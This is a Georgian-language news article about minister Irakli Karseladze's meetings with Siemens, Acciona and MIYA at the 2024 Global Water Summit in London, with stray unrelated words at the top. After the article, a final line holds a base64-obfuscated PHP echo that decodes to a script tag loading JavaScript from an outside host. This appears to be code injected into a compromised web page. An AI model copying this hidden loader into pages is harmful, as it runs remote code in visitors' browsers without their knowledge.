celsiusi
ავერსი შნაიდერი

საქართველოს რეგიონული განვითარებისა და ინფრასტრუქტურის მინისტრმა, ირაკლი ქარსელაძემ, ქალაქ ლონდონში, წყლის რესურსების მსოფლიო სამიტის (THE GLOBAL WATER SUMMIT 2024) ფარგლებში, ორმხრივი შეხვედრები გამართა.

მინისტრი კომპანია „სიმენსის“ (Siemens) წყლისა და წყალარინების პროგრამული უზრუნველყოფის სტრატეგიულ დირექტორ ადამ კარტრაიტს, ესპანური კომპანია „აქსიონას“ (Acciona) აღმასრულებელ დირექტორ მანუელ მაიონის და ესპანური კომპანია „მიას“ (MIYA) აღმასრულებელ დირექტორ ნოამ კომის შეხვდა.

შეხვედრაზე მხარეებმა იმსჯელეს მსოფლიო წყლის სამიტზე განხილულ საკითხებზე და ერთმანეთს გაუზიარეს საკუთარი გამოცდილება წყლის რესურსების მართვასა და სასმელი წყლით მოსახლეობის უზრუნველყოფის მიმართულებით.

„სამიტის ფარგლებში გავმართეთ შეხვედრები მსოფლიოს ლიდერ კომპანიებთან. გავაცანით ის შედეგები, რაც წყალმომარაგების და წყალარინების პროექტების განხორციელების კუთხით გვაქვს საქართველოში. მათგან მოვისმინეთ ის წარმატებული მსოფლიო გამოცდილება, რომელიც გარდა მშენებლობისა მოიცავს ინოვაციებს და ენერგოეფექტურ გადაწყვეტებს, რაც ძალიან მნიშვნელოვანია ჩვენთვისაც. შესაბამისად, დავსახეთ შემდგომი ნაბიჯები, რომ მათი წარმატებული გამოცდილება უკვე ჩვენც გამოვიყენოთ როგორც პროექტების განვითარების, ისე ოპერირების მიმართულებით და ეფექტურობის ამაღლების მნიშვნელოვანი ღონისძიებები გავატაროთ,“-განაცხადა ირაკლი ქარსელაძემ.

მინისტრმა კოლეგებს გააცნო საქართველოში წყალმომარაგების სისტემების განვითარებისათვის მთავრობის მიერ დასახული გეგმები, რასაც მათ მაღალი შეფასება მისცეს.

შეხვედრას, ასევე, ესწრებოდნენ საქართველოს დელეგაციის წევრები - საქართველოს რეგიონული განვითარებისა და ინფრასტრუქტურის მინისტრის მოადგილე მზია გიორგობიანი და შპს გაერთიანებული წყალმომარაგების კომპანიის დირექტორი ალექსანდრე თევდორაძე.

კომპანია Acciona გლობალური ჯგუფია, რომელიც ავითარებს და მართავს მდგრად ინფრასტრუქტურას, განსაკუთრებით განახლებადი ენერგიის მიმართულებით. კომპანიის ბიზნეს საქმიანობა მოიცავს ასეთი ინფრასტრუქტურის როგორც პროექტირებას, ისე მშენებლობასა და მართვას მსოფლიოს 40 ქვეყანაში. კომპანია Siemens ეხმარება წყლის სექტორის კომპანიებს კლიმატის ცვლილებისა და მზარდი ურბანიზაციის პირობებში ინოვაციებით, ახალი ტექნოლოგიებისა და დიგიტალიზაციის განვითარებით დაძლიოს სასმელი წყლის გაზრდილი მოთხოვნა და წყლის რესურსების მდგრადი დაცვა. კომპანია MIYA წყლის ოპერატორი დიდი გამოცდილების მქონე კომპანიაა, რომელიც ოპერირებს ხუთ კონტინენტზე და ორიენტირებულია წყლის რესურსების ეფექტურ გამოყენებაზე, წმენდასა და კომერციულ მართვაზე.

წყლის რესურსების მსოფლიო სამიტი მიმდინარე წლის 15 მარტს გაიხსნა და მასში 80 ქვეყნის 900 დელეგატი მონაწილეობდა 500-მდე კომპანიის და საერთაშორისო თუ სახელმწიფო ორგანიზაციის წარმომადგენლების სახით. სამიტზე მონაწილეობა მიიღეს აშშ-ს, კანადის, ავსტრალიის, ახალი ზელანდიის, ევროკავშირის წევრი ქვეყნების, ჩინეთის, საუდის არაბეთის, ბრაზილიის და სხვა ქვეყნის წყლის სექტორის წარმომადგენლებმა.

198
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");